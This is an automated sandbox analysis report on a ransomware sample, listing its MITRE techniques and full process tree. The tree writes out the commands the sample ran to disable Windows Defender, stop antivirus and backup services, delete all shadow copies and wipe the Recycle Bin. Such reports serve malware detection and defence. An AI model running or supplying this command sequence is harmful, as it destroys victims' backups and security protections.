1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
7s
max time network
150s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
Size

89KB
MD5

c0d3aae8bda692a1a97b54d9db53be65
SHA1

dba09fa80ad5a64780777827ba27c3bc8443009c
SHA256

551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c
SHA512

adb56650b539694f8f0976e1ed1cc46f98360062ff0edbd79b413a29efcb20176b37af67f1b50f2359cde3f2cd2ce9f1f242f1b4ad5c327bb9d5819d86584066

Score

10^/10

discovery evasion ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 9 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6528	icacls.exe
4716	icacls.exe
3040	icacls.exe
2388	icacls.exe
6680	icacls.exe
6600	icacls.exe
812	icacls.exe
5968	icacls.exe
6428	icacls.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
6224	vssadmin.exe
6216	vssadmin.exe
6172	vssadmin.exe
6088	vssadmin.exe
6232	vssadmin.exe
6200	vssadmin.exe
6180	vssadmin.exe
6164	vssadmin.exe
6248	vssadmin.exe
5480	vssadmin.exe
6208	vssadmin.exe
6192	vssadmin.exe
6152	vssadmin.exe
6240	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
6536	taskkill.exe
260	taskkill.exe
5608	taskkill.exe
5524	taskkill.exe
4820	taskkill.exe
5544	taskkill.exe
6752	taskkill.exe
6968	taskkill.exe
1288	taskkill.exe
6796	taskkill.exe
7056	taskkill.exe
6804	taskkill.exe
4648	taskkill.exe
3964	taskkill.exe
5332	taskkill.exe
4972	taskkill.exe
5856	taskkill.exe
5376	taskkill.exe
6060	taskkill.exe
4428	taskkill.exe
7164	taskkill.exe
6976	taskkill.exe
7116	taskkill.exe
6464	taskkill.exe
6832	taskkill.exe
924	taskkill.exe
4808	taskkill.exe
6032	taskkill.exe
7136	taskkill.exe
4856	taskkill.exe
6784	taskkill.exe
6184	taskkill.exe
6124	taskkill.exe
5396	taskkill.exe
6496	taskkill.exe
4848	taskkill.exe
4644	taskkill.exe
2544	taskkill.exe
6884	taskkill.exe
4532	taskkill.exe
6924	taskkill.exe
3312	taskkill.exe
5144	taskkill.exe
6816	taskkill.exe
6940	taskkill.exe
1176	taskkill.exe
4304	taskkill.exe
6644	taskkill.exe
184	taskkill.exe
6084	taskkill.exe
5888	taskkill.exe
6184	taskkill.exe
2208	taskkill.exe
5636	taskkill.exe
1832	taskkill.exe
4552	taskkill.exe
4492	taskkill.exe
6084	taskkill.exe
5508	taskkill.exe
6064	taskkill.exe
7144	taskkill.exe
6276	taskkill.exe
5312	taskkill.exe
3824	taskkill.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
6400	reg.exe
5268	reg.exe
6348	reg.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6176	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
836	powershell.exe
836	powershell.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
836	powershell.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

description	pid	Process
Token: SeDebugPrivilege	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
Token: SeDebugPrivilege	836	powershell.exe
Token: SeIncreaseQuotaPrivilege	836	powershell.exe
Token: SeSecurityPrivilege	836	powershell.exe
Token: SeTakeOwnershipPrivilege	836	powershell.exe
Token: SeLoadDriverPrivilege	836	powershell.exe
Token: SeSystemProfilePrivilege	836	powershell.exe
Token: SeSystemtimePrivilege	836	powershell.exe
Token: SeProfSingleProcessPrivilege	836	powershell.exe
Token: SeIncBasePriorityPrivilege	836	powershell.exe
Token: SeCreatePagefilePrivilege	836	powershell.exe
Token: SeBackupPrivilege	836	powershell.exe
Token: SeRestorePrivilege	836	powershell.exe
Token: SeShutdownPrivilege	836	powershell.exe
Token: SeDebugPrivilege	836	powershell.exe
Token: SeSystemEnvironmentPrivilege	836	powershell.exe
Token: SeRemoteShutdownPrivilege	836	powershell.exe
Token: SeUndockPrivilege	836	powershell.exe
Token: SeManageVolumePrivilege	836	powershell.exe
Token: 33	836	powershell.exe
Token: 34	836	powershell.exe
Token: 35	836	powershell.exe
Token: 36	836	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	3912	powershell.exe
Token: SeDebugPrivilege	3756	powershell.exe
Token: SeDebugPrivilege	3840	Process not Found
Token: SeDebugPrivilege	924	powershell.exe
Token: SeDebugPrivilege	2504	net1.exe
Token: SeDebugPrivilege	4164	Process not Found
Token: SeDebugPrivilege	4304	taskkill.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 3904 wrote to memory of 836	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	71
PID 3904 wrote to memory of 836	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	71
PID 3904 wrote to memory of 2836	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	78
PID 3904 wrote to memory of 2836	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	78
PID 3904 wrote to memory of 3912	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	80
PID 3904 wrote to memory of 3912	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	80
PID 3904 wrote to memory of 2352	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	82
PID 3904 wrote to memory of 2352	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	82
PID 3904 wrote to memory of 3756	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	84
PID 3904 wrote to memory of 3756	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	84
PID 3904 wrote to memory of 3840	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	86
PID 3904 wrote to memory of 3840	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	86
PID 3904 wrote to memory of 924	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	88
PID 3904 wrote to memory of 924	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	88
PID 3904 wrote to memory of 2504	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	90
PID 3904 wrote to memory of 2504	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	90
PID 3904 wrote to memory of 4164	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	92
PID 3904 wrote to memory of 4164	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	92
PID 3904 wrote to memory of 4304	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	496
PID 3904 wrote to memory of 4304	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	496
PID 3904 wrote to memory of 4444	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	96
PID 3904 wrote to memory of 4444	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	96
PID 3904 wrote to memory of 4552	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	803
PID 3904 wrote to memory of 4552	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	803
PID 3904 wrote to memory of 4656	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	513
PID 3904 wrote to memory of 4656	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	513
PID 3904 wrote to memory of 4700	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	102
PID 3904 wrote to memory of 4700	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	102

C:\Users\Admin\AppData\Local\Temp\551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  PID:3840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  PID:2504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  PID:4164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  PID:4304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:4444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:4656
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:4916
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:4760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:4804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:5216
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:4896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5284
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:4844
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:5240
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:5388
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:5016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5404
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:5064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:2696
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5560
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:4172
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:5584
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:5060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5880
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5188
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:5944
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:6112
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:6100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:5868
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:4588
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:5428
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:5132
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6280
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:6288
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:6632
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5796
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6548
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:6004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:6948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:5712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:4916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:4588
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:6256
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:6248
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6240
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6232
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6224
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6216
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6208
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6200
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6192
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6180
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6172
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6164
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6152
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:6184
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5480
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  PID:5396
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  PID:6108
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:5888
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4152
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:5876
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:6060
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:4500
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:5984
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:5912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:5592
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5040
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5844
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:4236
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:6080
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5916
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:4792
